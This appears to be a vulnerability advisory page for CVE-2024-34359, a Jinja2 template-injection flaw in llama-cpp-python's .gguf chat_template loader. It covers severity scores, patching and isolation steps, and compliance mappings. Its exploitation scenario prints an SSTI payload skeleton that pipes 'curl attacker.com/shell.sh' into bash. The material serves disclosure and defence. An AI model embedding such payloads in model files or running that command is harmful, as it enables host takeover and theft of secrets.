CVE-2024-34359: llama-cpp-python: SSTI in .gguf loader enables RCE

CRITICAL PoC AVAILABLE CISA: ATTEND
Published May 14, 2024
CISO Take

Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

What is the risk?

Critical exposure for all llama-cpp-python deployments. CVSS 9.6 with network vector and low complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag is misleading in AI/ML contexts — loading new models is routine workflow for developers, MLOps, and researchers, making this practically no barrier. Scope change (C:H/I:H/A:H) means full host takeover, not just model compromise. No evidence of active KEV exploitation at time of publication, but model-as-attack-vector is a maturing supply chain threat with high probability of real-world abuse.

How severe is it?

CVSS 3.1
9.6 / 10
EPSS
28.4%
chance of exploitation in 30 days
Higher than 98% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
EPSS exploit prediction: 28%
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C High
I High
A High

What should I do?

6 steps
  1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.

  2. Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries.

  3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.

  4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).

  5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.

  6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 23 - Obligations of providers of general-purpose AI models
ISO 42001
A.6.2.5 - AI system security A.8.1 - AI supplier relationships
NIST AI RMF
GOVERN 5.2 - AI supply chain and third-party risk management MANAGE 2.4 - Risks from AI system components and dependencies
OWASP LLM Top 10
LLM03 - Supply Chain

Frequently Asked Questions

What is CVE-2024-34359?

Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

Is CVE-2024-34359 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-34359, increasing the risk of exploitation.

How to fix CVE-2024-34359?

1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing. 2. Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries. 3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files. 4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers). 5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry. 6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.

What systems are affected by CVE-2024-34359?

This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.

What is the CVSS score for CVE-2024-34359?

CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 28.42%.

What is the AI security impact?

Affected AI Architectures

local LLM inferencemodel serving APIsLLM application frameworksAI development workstationsMLOps and CI/CD pipelines

MITRE ATLAS Techniques

AML.T0002.001 Models
AML.T0010.003 Model
AML.T0011.000 Unsafe AI Artifacts
AML.T0018.002 Embed Malware
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Article 15, Article 23
ISO 42001: A.6.2.5, A.8.1
NIST AI RMF: GOVERN 5.2, MANAGE 2.4
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.

Exploitation Scenario

An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload exploiting Python's object introspection: `{{ ''.__class__.__mro__[2].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via a search or dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation — before any prompts are sent — the template is parsed and rendered in an unsandboxed environment, executing the payload. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.

Weaknesses (CWE)

CWE-76 — Improper Neutralization of Equivalent Special Elements: The product correctly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.

  • [Requirements] Programming languages and supporting technologies might be chosen which are not subject to these issues.
  • [Implementation] Utilize an appropriate mix of allowlist and denylist parsing to filter equivalent special element syntax from all input.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Timeline

Published
May 14, 2024
Last Modified
November 21, 2024
First Seen
May 14, 2024

Related Vulnerabilities